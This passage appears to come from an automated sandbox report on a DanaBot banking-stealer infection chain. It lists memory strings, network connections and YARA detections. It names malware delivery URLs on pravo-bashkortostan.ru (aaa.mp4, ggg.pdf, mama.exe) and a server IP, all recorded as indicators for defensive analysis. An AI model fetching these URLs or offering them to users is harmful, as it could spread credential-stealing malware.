          Source: powershell.exe, 00000007.00000002.1286194255.0000019C8585F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B15B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B1A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B1A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfua/ns/id/
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: mama.exe, 0000002B.00000003.1633314719.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000003.1637182986.000000007EB1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
          Source: mama.exe, 0000002B.00000003.1629952026.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: mama.exe, 0000002B.00000003.1629952026.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
          Source: powershell.exe, 00000007.00000002.1286194255.0000019C8589C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1286194255.0000019C85887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B15B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: svchost.exe, 0000000C.00000003.1321844798.000001A414D5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 0000000C.00000003.1321844798.000001A414CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: mshta.exe, 00000008.00000002.1636007148.00000164FD669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comx
          Source: powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B329E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru
          Source: mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/
          Source: mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/Hl
          Source: mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618651487.0000016CFFE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4
          Source: powershell.exeString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4$global:?
          Source: mshta.exe, 00000008.00000002.1636007148.00000164FD64E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4&
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4(&
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4(j
          Source: mshta.exe, 00000008.00000002.1637882700.0000016CFFD56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4...
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp413
          Source: mshta.exe, 00000008.00000003.1616421550.0000016CFFAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615879098.0000016CFFAEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp439
          Source: mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636007148.00000164FD640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4C:
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4D
          Source: ssh.exe, 00000000.00000002.1638779709.000001EE2F560000.00000004.00000020.00020000.00000000.sdmp, powershell.exeString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ
          Source: mshta.exe, 00000008.00000002.1636560896.00000164FD7B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4H
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4N
          Source: mshta.exe, 00000008.00000003.1616777424.0000016CFFDD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1616673537.0000016CFFDD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4OOC:
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4Z&
          Source: mshta.exe, 00000008.00000003.1616777424.0000016CFFDD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1616673537.0000016CFFDD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618898208.0000016CFFE1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1638082201.0000016CFFE33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4aLMEMPXQp
          Source: mshta.exe, 00000008.00000002.1636007148.00000164FD669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4ational
          Source: mshta.exe, 00000008.00000002.1636662296.00000164FD840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4exeDriverD
          Source: mshta.exe, 00000008.00000003.1628992982.0000016CFFF67000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628815938.0000016CFFF66000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1629166654.0000016CFFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4foigf
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4for
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4gramFiles(x86)=C:
          Source: mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4
          Source: mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortos
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4jdgva
          Source: mshta.exe, 00000008.00000003.1628992982.0000016CFFF67000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628815938.0000016CFFF66000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1629166654.0000016CFFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4jpqumkz
          Source: mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4jqj
          Source: mshta.exe, 00000008.00000003.1616421550.0000016CFFAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615879098.0000016CFFAEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4l
          Source: mshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4ll
          Source: powershell.exe, 00000007.00000002.1286194255.0000019C85841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4p
          Source: mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4private
          Source: mshta.exe, 00000008.00000002.1636007148.00000164FD669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4t
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4v
          Source: powershell.exe, 00000007.00000002.1285967764.0000019C83A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4ws
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/aaa.mp4x
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B19C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdf
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B329E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdfp
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B1AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exe
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B1AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exeu
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49728 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR

          System Summary

          barindex
